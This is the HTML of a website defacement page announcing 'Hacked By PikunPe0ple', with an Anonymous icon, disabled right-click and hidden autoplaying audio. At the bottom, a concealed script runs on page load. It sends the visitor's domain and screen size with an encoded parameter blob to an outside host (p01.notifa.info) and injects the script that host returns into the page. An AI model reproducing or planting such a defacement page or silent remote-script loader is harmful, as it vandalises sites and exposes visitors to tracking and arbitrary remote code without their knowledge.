





<html>

   <head>

      <title>Leave?</title>

<link rel="icon" type="image/x-icon" href="https://vignette.wikia.nocookie.net/devilmaycry/images/0/0d/Anonymous_logo.png/revision/latest?cb=20120927033254">

<meta name="title" content="Whoops?">

<meta name="googlebot" content="index,follow"/>

<meta name="robots" content="all"/>

<meta name="robots schedule" content="auto"/>

<meta name="distribution" content="global"/>

<meta contact='#'/>

<meta charset="utf-8">



  <style>

            html, body {

                color: #FFFFFF;

                font-family: 'Fredericka the Great', sans-serif;

                font-weight: 100;

                height: 100vh;

                margin: 0;

            }



            .full-height {

                height: 100vh;

            }



            .flex-center {

                align-items: center;

                display: flex;

                justify-content: center;

            }



            .position-ref {

                position: relative;

            }



            .content {

                text-align: center;

            }



            .title {

                font-size: 36px;

                padding: 20px;

            }

        </style> 



    </head>



<body align="center" oncontextmenu="return false" bgcolor="000000">

<div class="stars">

<div class="twinkling">

<div class="flex-center position-ref full-height">

            <div class="content">

     <embed src="https://www.youtube.com/embed/AoMExJwmXnQ?&autoplay=1" type="audio/mpeg" autostart="true" loop="true" height="0" width="0">

                <div class="text"><font color="#FFFFF">

<br><img src="https://scontent.fcgk18-1.fna.fbcdn.net/v/t1.0-1/c1.0.160.160a/p160x160/69601025_404681400041453_4308555984114024448_n.jpg?_nc_cat=103&_nc_eui2=AeEmSnWWkCS4nMK-bOlAQRTXqEXLuU58g1f8UK9jpLUp1JxT9DxPC1Jz4ukvNo52Rfs6tZ5CZaRPuyYJD5Uq2hU6nOFfw2OmLk0xFCb_VspWcg&_nc_oc=AQk59RGZh3PSyOHu4eXuMUWQyL6IJQJJv6tvzD-k2YiTFG2FvAZUiKM-DSIn2SYUJkU&_nc_ht=scontent.fcgk18-1.fna&oh=687e4128601f1e2b2e398375bcd8a689&oe=5E0FC28B">

<br>

<font size="5"><b><i><code>Hacked By PikunPe0ple</font>

<br>

<code>Don't Touch My Waifu~
</div>

</div>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2ize6ZgU%2fXXoSce4rUwkUK1Jey3uvYuVc%2bJpKlkpSfGsVIW6dpjKUx9wEgFjYu2xsl0aGXxZPwbiUMsP8NJ4CJU1dqOhJWAYx%2fQQqqUgtyJC8xlpYc4UZo%2fLFffoPTv6iNL%2fBfw03T2U%2bindET7SnHlyzpmXauWneLqJMIcvUlhzhwwaxdGN%2fRB24urGKylOqwhB%2fiSaa9VP3Kt6asoQAECqpA6SN453uej%2fC0FWitYBjGoDMJ2awVpDBiqucsMxqlc6I9asDN4yYpxwJzlaD%2f4NnRa0mKsrc7verevsyHN9hLiXV52O53n%2fvj%2bx2PHbu9EqPywqzcqS4ih9k5SWCDliI%2fle4fcCEGiAnt4ymQkeJ4ouPqEAI89k94psYEK%2fGS3lRjARnaigBw%2flCpyyrOOeFNoL5zg5cSwKw5ESymRAbGDV4J29NgrVulh%2bvtTqcAolzD5tpifUxixNnw3Ce%2baSNyDKH2nskQJk2YU2GRRapa3Lg6MU7JVuOYPj9AYEmo3Ryy7bSPKUunirEESwBXee55WSgwpC2" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>

